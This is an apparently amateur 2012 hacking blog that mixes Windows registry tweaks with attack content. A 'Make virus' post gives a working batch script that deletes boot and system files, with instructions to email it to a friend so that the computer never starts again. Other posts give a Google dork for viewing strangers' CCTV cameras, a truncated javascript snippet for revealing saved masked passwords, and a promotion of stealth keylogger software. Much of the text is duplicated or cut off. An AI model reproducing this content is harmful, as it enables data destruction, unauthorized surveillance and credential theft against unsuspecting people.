Wednesday 2 January 2013
Tuesday 6 November 2012
On 19:24 by chandan in Registry hacking 2 comments
Ever wanted to pin a folder t the start menu to gain faster access to it ?
Well , it is possible to add the Pin to start menu option so that you can plug your favorite folders to start menu .
Here is a step by step procedure:
Open the Registry Editor and navigate to:
HKEY_CLASSES_ROOT\Folder\shellex\ContexMenuHundlers
Right click on “ContexMenuHandlers” and select New-> key.
Name the key as follows:
{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
Now, whenever you want to add a folder to Start Menu, hold down the Shift key and right-click on the folder. You should click on the folder. You should see the “Pin to Start Menu”
Option in the context menu”.
Well , it is possible to add the Pin to start menu option so that you can plug your favorite folders to start menu .
Here is a step by step procedure:
Open the Registry Editor and navigate to:
HKEY_CLASSES_ROOT\Folder\shellex\ContexMenuHundlers
Right click on “ContexMenuHandlers” and select New-> key.
Name the key as follows:
{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
Now, whenever you want to add a folder to Start Menu, hold down the Shift key and right-click on the folder. You should click on the folder. You should see the “Pin to Start Menu”
Option in the context menu”.
On 18:20 by chandan in Registry hacking No comments
You can now add your favorite programs to Windows Startup without the need for using the start-up folder. Here is a way to do this:
Open the Registry Editor and go to this path one by one:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
On the right side pane, create a new “String Value: and rename it to the name of the program that you want to add (you can give any name, it doesn’t matter).
Double click on the “String Value”, in the “Value data field add the path of the executable program that has to execute at startup.
Reboot the computer to see the changes in effect.
Works on Windows XP, vista and 7.
Open the Registry Editor and go to this path one by one:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
On the right side pane, create a new “String Value: and rename it to the name of the program that you want to add (you can give any name, it doesn’t matter).
Double click on the “String Value”, in the “Value data field add the path of the executable program that has to execute at startup.
Reboot the computer to see the changes in effect.
Works on Windows XP, vista and 7.
On 18:08 by chandan in Registry hacking No comments
Here is a simple hack to change the name of the Registered owner on your computer:
Open the Registry Editor and navigate to:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
On the right side pane, find the keys RegisteredOwner and RegisteredOrgannization.
Double click on them to change the name to whatever you want.
To see the changes,, right click on “My Computer” and select “Properties”.
Work on Windows XP, Vista and 7
On 18:03 by chandan in Registry hacking No comments
Need t limit access to your computer by disabling the Task Manager?
Her is a simple registry hack to do this:
Open the Registry Editor and navigate to the following key:
HKEY_CURRENToUSER\Software\Microsoft\Windows\CurrentVersion\Policies
Right –click on “Policies”. Select New-> Key and name the key as System.
If you are on Windows XP, you need not create the new key “System” as it is already present in it. So, you can directly navigate to : HKEY_CURRENT-USER
Software\Microsoft\Windows\CurrentVersion\Policies\System in the step-1
Itself.
Right click on “System”, create a new “DWORD” and name it to DisableTaskMgr.
Double-click on the DWORD “DisableTaskMgr” and set the “Value data” to 1 (0=Enable, 1=Disable).
To enable the Task Manager, Set the “Value data” back to 0.
Works on Windows XP, Vista and 7
Her is a simple registry hack to do this:
Open the Registry Editor and navigate to the following key:
HKEY_CURRENToUSER\Software\Microsoft\Windows\CurrentVersion\Policies
Right –click on “Policies”. Select New-> Key and name the key as System.
If you are on Windows XP, you need not create the new key “System” as it is already present in it. So, you can directly navigate to : HKEY_CURRENT-USER
Software\Microsoft\Windows\CurrentVersion\Policies\System in the step-1
Itself.
Right click on “System”, create a new “DWORD” and name it to DisableTaskMgr.
Double-click on the DWORD “DisableTaskMgr” and set the “Value data” to 1 (0=Enable, 1=Disable).
To enable the Task Manager, Set the “Value data” back to 0.
Works on Windows XP, Vista and 7
On 17:55 by chandan in Registry hacking No comments
3. ADD “Recycle Bin” to My Computer in Windows 7 and Vista:
Would you like to add the “Recycle Bin” icon to My Computer then this tutorial is for you.
Let’s start:
Open the Registry Editor and navigate to following key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer
\NameSpace
Right-click on “NameSpace” and select New->key. Name the key with the following name :
{ 645ff040-5081-101B-9F08-00AA002F954E}
Now, Open “My computer” and hit F5 to refresh the screen. This should show up the Recycle Bin” icon
Would you like to add the “Recycle Bin” icon to My Computer then this tutorial is for you.
Let’s start:
Open the Registry Editor and navigate to following key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer
\NameSpace
Right-click on “NameSpace” and select New->key. Name the key with the following name :
{ 645ff040-5081-101B-9F08-00AA002F954E}
Now, Open “My computer” and hit F5 to refresh the screen. This should show up the Recycle Bin” icon
On 17:50 by chandan in Registry hacking No comments
Microsoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the windows registry so as to add more extra features and functionalities to their operating system.
If you’re one such geek who would like to customize windows in your own way, here is a list of 8 interesting registry hacks that you need to try.2. Disable Notification Balloons in Windows 7 and vista:
You can now disable the annoying notification balloons that keep popping up frequently with warning messages and reminders. Here is s a step by step procedure to do that:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Right-click on the right-hand pane, and create a new “DWORD”.
Rename it to EnableBalloonTips, double-click on it and set the “Value data” to 0.Reboot the compute to see the changes in effect.
On 17:44 by chandan in Registry hacking No comments
Microsoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the windows registry so as to add more extra features and functionalities to their operating system.
If you’re one such geek who would like to customize windows in your own way, here is a list of 8 interesting registry hacks that you need to try.
1.Disable USB devices:
Disabling USB ports can be a smart idea t add security to the computer. This can be really handy if the compute is on a public pace where the chances of virus and other malware infection is really high. You can easily disable access to USB ports with the following registry hack:
Open the Registry Editor (start->Run->Type regedit and hit Enter)
In the registry, navigate to the following key:
HKEY_LOCAL-MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
In the right-side pane, double-click on “Start”.
In the “Value data” field enter 4 and click on “OK”
Close the Registry Editor and reboot.
To enable USB devices, follow the same procedure as above except n the step-4 enter 3 in the “Value data” field.
Works on Window XP, Vista and 7.
Friday 2 November 2012
On 16:30 by chandan in remote hacking No comments
Today, keylogger would only paint half a picture of someones computer activity and because of this the name " Keylogger " has progressed to become ‘Computer Monitoring Software’. Through the internet, you can access a whole range of computer monitoring
software and keyloggers, some are malicious, some aren’t, but they usually encompass a range of standard features.
‘Commercial Computer Monitoring Software is the type of software that you need if you wanted to monitor a lazy employee or a wayward teenagers computer activity. These types of computer monitoring software are never meant to be used maliciously, and almost always come with a disclaimer that has to be acknowledged before you can install the software. These applications have a number of powerful features in 2012 and although they vary from developer to developer, they usually include a standard set of features.
Along with the keystroke monitoring (which will monitor all keys pressed, along with the time and date they were pressed and the application they were typed in to), the second feature you will find in most modern software is screenshot monitoring. This can usually be set to take a screenshot either at set time intervals, or every time a new window becomes active.
Of course, it goes without saying that along with the keystrokes and screenshots, most applications will log all applications used, and the date and time of the use (sometimes, along with the length of use). But today, the most important feature of any monitoring software is internet/website monitoring. Most software will monitor all websites visited (or all web requests) and the date and time of the visit, while also taking a screenshots of the visited website. This can all be used along with the keystroke monitoring to gain user names, passwords and web mail sent and received.
The next most common feature will be document, file and printer monitoring. These features are a must if you’re looking to monitor someone in an office environment. They usually work by monitoring all files opened, saved, copied and deleted, along with the date and time of the activity. Print monitoring will also monitor when a document is printed, along with the name of the printer used. The computers clipboard will also be monitored, so anything that’s been copied and pasted will be logged.
These features are usually the standard set you will find in modern computer monitoring software, although most software will vary on what else they offer (some monitor webcams, GPS etc). Almost all of these applications will run in complete stealth (not showing in the task manager, start menu, add/remove programs etc) and will be opened using a secret key combination and a password
John Jones, the author of this article runs ‘Gecko Monitor’ – the powerful and stealthy computer monitoring software.
download a free trial Monitor head keylogger
http://www.GeckoMonitor.com
Enjoy friends....Thank you for visit here
On 09:32 by chandan in Make virus No comments
Hi friends today i am going to tell you how you can shutdown your friend's computer or eniy's computer,So lets start.
NOTE:You have to to it at your own risk because you can not recover your data after click it.
Lets start
1:Open your notepad.
2:Just copy the below code into your notepad.
@ echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r-s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3:Save it with any name(eg. virus) with the extension .bat (like eg. virus.bat).
4:Now your virus has created.
5:Now send it to your friend as mail.When he will click on it "THE GAME IS OVER"
next time when he will start his computer it will never start again so enjoy friends
NOTE:You have to to it at your own risk because you can not recover your data after click it.
Lets start
1:Open your notepad.
2:Just copy the below code into your notepad.
@ echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r-s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3:Save it with any name(eg. virus) with the extension .bat (like eg. virus.bat).
4:Now your virus has created.
5:Now send it to your friend as mail.When he will click on it "THE GAME IS OVER"
next time when he will start his computer it will never start again so enjoy friends
Wednesday 31 October 2012
On 00:43 by chandan in secure password No comments
This year we have seen some big Security breaches that expose millions of passwords like Yahoo!, LinkedIn, eHarmony and Last.fm, among others , SplashData Reveals Its Annual "25 Worst Passwords of the Year" List.
The three worst passwords haven't changed since 2011; they're password, 123456 and 12345678. The new worst passwords added to this year's list include welcome, jesus, ninja, mustang and password1. Have you ever used one of the most popular passwords of 2012 for your own personal accounts?
SplashData CEO Morgan Slain stated “At this time of year, people enjoy focusing on scary costumes, movies and decorations, but those who have been through it can tell you how terrifying it is to have your identity stolen because of a hacked password.”
“We’re hoping that with more publicity about how risky it is to use weak passwords, more people will start taking simple steps to protect themselves by using stronger passwords and using different passwords for different websites.”
I am sure hope you didn't find one of your passwords. If you did, I highly advise you switch it fast. In order to create a safer password, use security phrases with at least eight characters while utilizing a variety of characters within the phrase. Also use multiple passwords across different types of sites.
Password management applications also can help users keep track of their passwords and avoid using the same password for multiple sites, which is another bad practice, especially when mixing, say, entertainment and social networking sites with financial services
Tuesday 30 October 2012
On 22:58 by chandan in HACK CCTV CAMERA 4 comments
I am going to show you how you can hack the CCTV cameras located in the world.
You can see the online view of any CCTV camera online.
REQUIREMENT;
1. 3G internet connection
Lets start the tutorial:
1: Open the google.com into your web browser.
2: Type the following string on the search box of google
inurl:”CgiStart? Page=”
3: Press Enter
4:It will show you the online CCTV camera from all over the world.
Now choose any one that you want to see…
Now enjoy……
Thank you friends
On 00:43 by chandan in hidden password 1 comment
To show the hidden password in ****(form).I am going to show you you how you can reveal that password in the alert box
NOTE:This tutorial is for education purpose only.I am not responsible for any action against you
I am assuming that you have logged in into any one's account
Script:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j
The above is a javascript code.now the steps begin
1. Copy this script except j(first letter of the script)
Note:If you copied it with j script will not work it will show you an error
2.Now paste it on the address bar you have logged in(in which the password text box is there)
3.now type j at first location or the script you have copied on the URL
4.Now hit enter.It will pop up a windows alert box with the password hidden in **** form
THANK YOU FRIENDS
Monday 29 October 2012
On 23:41 by chandan in Free Internet No comments
Now you can access free inter net on your mobile
Setting for you on ucweb is
Settings Name:Gpupi117
Apn:upi117
Username:upi
prompt:i117
Authentication :Secure
Home page : flyproxy
Tuesday 16 October 2012
On 00:51 by chandan in How to change mac address in backtrack 5 No comments
HOW TO CHANGE MAC ADDRESS IN BACKTRACK 5
I am going to tell you how can you change mac address in you backtrack 5 step by step
- step 1: Open your backtrack terminal and type ifconfig to check your MAC Address
- step 2: In terminal, type ifconfig eth0 down this command is used for disabling the eth0 interface.
- step 3: Now change the MAC address by using a simple command in backtrack macchanger –r eth0
- step 4: Now type ifconfig eth0 up this command is used for enabling the eth0 interface
Tuesday 25 September 2012
Thursday 6 September 2012
On 00:14 by chandan No comments
Process:
1. Choose the file or Folder that you want to make password protected.
2. Right Click of mouse on it and Choose "Add to archieve" from the Winrar commands.If you not find the Add to archieve command then
Check: How to add "Add to Archieve" command of Winrar to Context menu
3. On the open Window navigate to "Advanced" tab.
4. Choose "Set password". And Give password to the RAR file.
5. Check the Option "Encrypt file names".
Note: If you check the option then Any body will try to open the RAR file then it will ask for password. If not then any body try to open the file or folder inside the RAR file then it will Ask for Password.
6. Now Click on "OK" and Save all the Changes.
7. A new RAR file will be created with the Same name of the file or folder which is password protected. Now delete the old.
1. Choose the file or Folder that you want to make password protected.
2. Right Click of mouse on it and Choose "Add to archieve" from the Winrar commands.If you not find the Add to archieve command then
Check: How to add "Add to Archieve" command of Winrar to Context menu
3. On the open Window navigate to "Advanced" tab.
4. Choose "Set password". And Give password to the RAR file.
5. Check the Option "Encrypt file names".
Note: If you check the option then Any body will try to open the RAR file then it will ask for password. If not then any body try to open the file or folder inside the RAR file then it will Ask for Password.
6. Now Click on "OK" and Save all the Changes.
7. A new RAR file will be created with the Same name of the file or folder which is password protected. Now delete the old.
Tuesday 4 September 2012
On 18:52 by chandan 3 comments
Seeing the amount of time and bandwidth students waste on social
networking sites and torrent downloads. Most of the colleges
(at-least in India) have blocked access to such sites on their network.
The effectiveness of this restrictive measures depend upon the system
used by the college to place this restrictions. Now most of this systems
can be easily bypassed by using some simple trick or procedure. But
some colleges employ professional system to place the restrictions.
Bypassing them can be a real headache. But here is a proxy service which
you can use to even bypass this professional systems. Frankly i didn't
try it, but one of my friend was facing the restrictions on his college
Wi-Fi, especially for torrent downloads. Now he had the options to use
other bypassing tricks but it would not work for him because he
was compelled to use his student login details to connect to the
internet and he feared that if the authorities came across his bypassing
he would be permenately blocked from the network. But when he used the
below proxy service according to him the proxy bypassed the whole login
procedure and directly connected to the internet.
Click here to visit PD-Proxy website
PD-Proxy
PD-Proxy
is a proxy software which uses tunneling to provide more secure
connection to the internet. According to my freind, it uses VPN to
bypass the system and connect directly to internet. If you are using
Wi-Fi this VPN service can be very useful as the information travelling
from your computer to the VPN is encryted and thus you have an added
layer of security.
To use the service, you have to visit their
website and sign up. Then download and install the software. Connect
through the software and enjoy. Their free account has 100mb limit.
Before you buy premium account please check if it works for you, don't
come blaming me later, because you can never be sure which service is
good to bypass a particular restricting system.
Subscribe to:
Posts (Atom)
Search
Categories
- After Effects Animation
- Animation
- Batch Virus
- blacklisted websites
- broadband hack
- Download HD Images
- Earn Paytm Cash
- Free Images
- Free Images Download
- Free Internet
- Free Web Hosing
- giveaway
- google dorks
- Google Hacking
- HACK CCTV CAMERA
- hacking
- HD Free Images
- heartbleed
- hidden password
- Hot Sunny Leone
- how to become hacker
- How to change mac address in backtrack 5
- Logo Animation
- Make virus
- MLM
- Online money making
- Paytm Cash
- pentesting ios application
- registery hack
- Registry hacking
- remote hacking
- secure password
- Sexy Babe
- Sexy Babe Strip
- Social Media Marketing
- Social Media Marketing Tips
- Sunny Leone
- Sunny Leone Nude
- Teasing
- Tips
- Witgie Giveaway